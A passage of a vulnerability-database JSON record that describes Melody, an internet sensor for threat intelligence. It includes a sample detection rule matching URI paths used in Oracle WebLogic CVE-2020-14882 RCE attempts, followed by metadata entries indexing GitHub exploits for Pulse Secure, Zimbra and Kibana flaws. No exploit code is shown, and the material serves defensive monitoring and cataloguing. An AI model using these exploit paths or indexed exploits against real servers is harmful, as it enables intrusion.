mock application\n\n# Use cases\n\n## Internet facing sensor\n\n * Extract trends and patterns from Internet's noise\n * Index malicious activity, [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) attempts and targeted scanners\n * Monitor emerging threats exploitation\n * Keep an eye on specific threats\n\n## Stream analysis\n\n * Build a background noise profile to make targeted attacks stand out\n * Replay captures to tag malicious packets in a suspicious stream\n\n# Preview\n\n[](<https://raw.githubusercontent.com/bonjourmalware/melody/master/readme/melody_demo.gif> \"Melody is a transparent internet sensor built for threat intelligence. Supports custom tagging rules and vulnerable application simulation. \\(29\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhQj2eANGQieq68xNvqOhhw8784kxPiunCGgC3GG4teclp_bm223AyPN61pqQDC2WiFWKphXL1aw_d3kIJxweG-Vrtygyoyr-z6CkaXcsx3astVn2zn2GyMD4NQn35qt7RvYA6tXIgBwlKP491vMWOGiIbkyWZJA7fuslVE5gzSquz0aKOuF21jm9bT>) [](<https://raw.githubusercontent.com/bonjourmalware/melody/master/readme/melody_demo_dash.png> \"Melody is a transparent internet sensor built for threat intelligence. Supports custom tagging rules and vulnerable application simulation. \\(30\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H>)\n\n# Quickstart\n\n[Quickstart details.](<https://bonjourmalware.github.io/melody/installation> \"Quickstart details.\" )\n\n## TL;DR\n\n### Release\n\nGet the latest release at `https://github.com/bonjourmalware/melody/releases`.\n \n \n make install # Set default outfacing interface \n make cap # Set network capabilities to start Melody without elevated privileges \n make certs # Make self signed certs for the HTTPS fileserver \n make enable_all_rules # Enable the default rules \n make service # Create a systemd service to restart the program automatically and launch it at startup \n \n sudo systemctl stop melody # Stop the service while we're configuring it\n\nUpdate the `filter.bpf` file to filter out unwanted packets.\n \n \n sudo systemctl start melody # Start Melody \n sudo systemctl status melody # Check that Melody is running \n\nThe logs should start to pile up in `/opt/melody/logs/melody.ndjson`.\n \n \n tail -f /opt/melody/logs/melody.ndjson # | jq\n\n### From source\n \n \n git clone https://github.com/bonjourmalware/melody /opt/melody \n cd /opt/melody \n make build\n\nThen continue with the steps from the [release](<https://github.com/bonjourmalware/melody#release> \"release\" ) TL;DR.\n\n### Docker\n \n \n make certs # Make self signed certs for the HTTPS fileserver \n make enable_all_rules # Enable the default rules \n mkdir -p /opt/melody/logs \n cd /opt/melody/ \n \n docker pull bonjourmalware/melody:latest \n \n MELODY_CLI=\"\" # Put your CLI options here. Example : export MELODY_CLI=\"-s -i 'lo' -F 'dst port 5555' -o 'server.http.port: 5555'\" \n \n docker run \\ \n --net=host \\ \n -e \"MELODY_CLI=$MELODY_CLI\" \\ \n --mount type=bind,source=\"$(pwd)/filter.bpf\",target=/app/filter.bpf,readonly \\ \n --mount type=bind,source=\"$(pwd)/config.yml\",target=/app/config.yml,readonly \\ \n --mount type=bind,source=\"$(pwd)/var\",target=/app/var,readonly \\ \n --mount type=bind,source=\"$(pwd)/rules\",target=/app/rules,readonly \\ \n --mount type=bind,source=\"$(pwd)/logs\",target=/app/logs/ \\ \n bonjourmalware/melody\n\nThe logs should start to pile up in `/opt/melody/logs/melody.ndjson`.\n\n# Rules\n\n[Rule syntax details.](<https://bonjourmalware.github.io/melody/installation> \"Rule syntax details.\" )\n\n## Example\n \n \n CVE-2020-14882 Oracle Weblogic Server RCE: \n layer: http \n meta: \n id: 3e1d86d8-fba6-4e15-8c74-941c3375fd3e \n version: 1.0 \n author: BonjourMalware \n status: stable \n created: 2020/11/07 \n modified: 2020/20/07 \n description: \"Checking or trying to exploit CVE-2020-14882\" \n references: \n - \"https://nvd.nist.gov/vuln/detail/CVE-2020-14882\" \n match: \n http.uri: \n startswith|any|nocase: \n - \"/console/css/\" \n - \"/console/images\" \n contains|any|nocase: \n - \"console.portal\" \n - \"consolejndi.portal?test_handle=\" \n tags: \n cve: \"cve-2020-14882\" \n vendor: \"oracle\" \n product: \"weblogic\" \n impact: \"rce\"\n\n# Logs\n\n[Logs content details.](<https://bonjourmalware.github.io/melody/layers> \"Logs content details.\" )\n\n## Example\n\nNetcat TCP packet over IPv4 :\n \n \n { \n \"tcp\": { \n \"window\": 512, \n \"seq\": 1906765553, \n \"ack\": 2514263732, \n \"data_offset\": 8, \n \"flags\": \"PA\", \n \"urgent\": 0, \n \"payload\": { \n \"content\": \"I made a discovery today. I found a computer.\\n\", \n \"base64\": \"SSBtYWRlIGEgZGlzY292ZXJ5IHRvZGF5LiAgSSBmb3VuZCBhIGNvbXB1dGVyLgo=\", \n \"truncated\": false \n } \n }, \n \"ip\": { \n \"version\": 4, \n \"ihl\": 5, \n \"tos\": 0, \n \"length\": 99, \n \"id\": 39114, \n \"fragbits\": \"DF\", \n \"frag_offset\": 0, \n \"ttl\": 64, \n \"protocol\": 6 \n }, \n \"timestamp\": \"2020-11-16T15:50:01.277828+01:00\", \n \"session\": \"bup9368o4skolf20rt8g\", \n \"type\": \"tcp\", \n \"src_ip\": \"127.0.0.1\", \n \"dst_port\": 1234, \n \"matches\": {}, \n \"inline_matches\": [], \n \"embedded\": {} \n }\n\n \n \n\n\n**[Download Melody](<https://github.com/bonjourmalware/melody> \"Download Melody\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T12:30:00", "type": "kitploit", "title": "Melody - A Transparent Internet Sensor Built For Threat Intelligence", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-04-13T12:30:00", "id": "KITPLOIT:914458182851735372", "href": "http://www.kitploit.com/2022/04/melody-transparent-internet-sensor.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[![GitHub Build Status](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-16T16:32:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781"], "modified": "2022-03-06T07:12:20", "id": "62891769-2887-58A7-A603-BCD5E6A6D6F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:53", "description": "# Zimbra-RCE\nZimbra RCE CVE-2019-9670\n\n```bash\n$ ./zimbra.py -h\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-16T15:22:27", "type": "githubexploit", "title": "Exploit for Improper Restriction of XML External Entity Reference in Synacor Zimbra Collaboration Suite", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9670"], "modified": "2019-08-17T01:04:11", "id": "CA0E08FF-FA48-5D7B-BE66-8EDAEBC47DD4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-12T19:20:38", "description": "# Zimbra-RCE\nZimbra RCE CVE-2019-9670\n\n```bash\n$ ./zimbra.py -h\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-16T04:37:11", "type": "githubexploit", "title": "Exploit for Improper Restriction of XML External Entity Reference in Synacor Zimbra Collaboration Suite", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9670"], "modified": "2022-08-12T15:00:54", "id": "AB8D54DF-6C46-5F5C-9D58-602EF9931860", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-24T04:38:07", "description": "# CVE-2019-7609\nKibana versions before 5.6.15 and 6.6.1 contain ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-24T04:38:26", "type": "githubexploit", "title": "Exploit for Code Injection in Elastic Kibana", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2021-08-25T01:42:36", "id": "DCFE3B87-DB52-53A3-8ED6-D8E4E7F8310E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-22T07:01:45", "description": "# CVE-2019-7609\nexploit CVE-2019-7609(kibana RCE) on right way b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-10-21T15:31:13", "type": "githubexploit", "title": "Exploit for Code Injection in Elastic Kibana", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2022-07-22T01:54:29", "id": "A591C24E-5E41-5381-A3EF-C4D96D99B48D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T03:57:20", "description": "# CVE-2019-7609 kibana-RCE <6.6.0 \u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u547d\u4ee4\u6267\u884c (Need Timelion And...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-10-18T03:25:22", "type": "githubexploit", "title": "Exploit for Code Injection in Elastic Kibana", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2022-03-17T07:18:13", "id": "7E04EAF8-3389-57FB-A065-6B4A948E7CCF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-29T09:58:09", "description": "# CVE-2019-7609\n\n> Kibana versions before 5.6.15 and 6.6.1 conta...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-10-21T07:32:31", "type": "githubexploit", "title": "Exploit for Code Injection in Elastic Kibana", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2022-03-29T06:34:50", "id": "34D7C94F-BF55-5CBE-B7E8-456373C099D3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T04:02:17", "description": "# CVE-2019-7609 (Kibana)\n\nKibana\uc758 Timelion visualizer\uc758 \uacb0\ud568\uc73c\ub85c \uc778\ud574 \ub9ac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-12-01T14:29:22", "type": "githubexploit", "title": "Exploit for Code Injection in Elastic Kibana", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2022-01-22T16:37:58", "id": "C23261C1-DC5B-5BCE-955D-334B11E8FC02", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:50", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-12-07T17:09:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "31DB22CD-3492-524F-9D26-035FC1086A71", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:19", "description": "# CVE-2019-11510-PulseVPN\n\nIn Pulse Secure Pulse Connect Secure ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-17T17:53:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-11-05T21:41:20", "id": "00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:27", "description": "# CVE-2019-11510-1\n\n## Exploit for Arbitrary File Read on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-27T09:21:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:31", "description": "# CVE-2019-11510 PoC\n\nPython script to explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-26T23:30:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "77912E98-768B-5AF5-AE06-1F42C6D88F72", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T18:22:40", "description": "# CVE-2019-11510-poc\nPulse Secure SSL VPN pre-auth file reading...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-22T08:18:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-06-22T14:31:19", "id": "DC044D23-6D59-5326-AB78-94633F024A74", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:45", "description": "Hi this is script to check IP address from shodan that vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-21T12:03:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-10-19T12:40:24", "id": "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-10T18:30:15", "description": "# pwn-pulse.sh\n**Exploit for Pulse Connect Secure SSL VPN arbitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-09-09T15:58:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 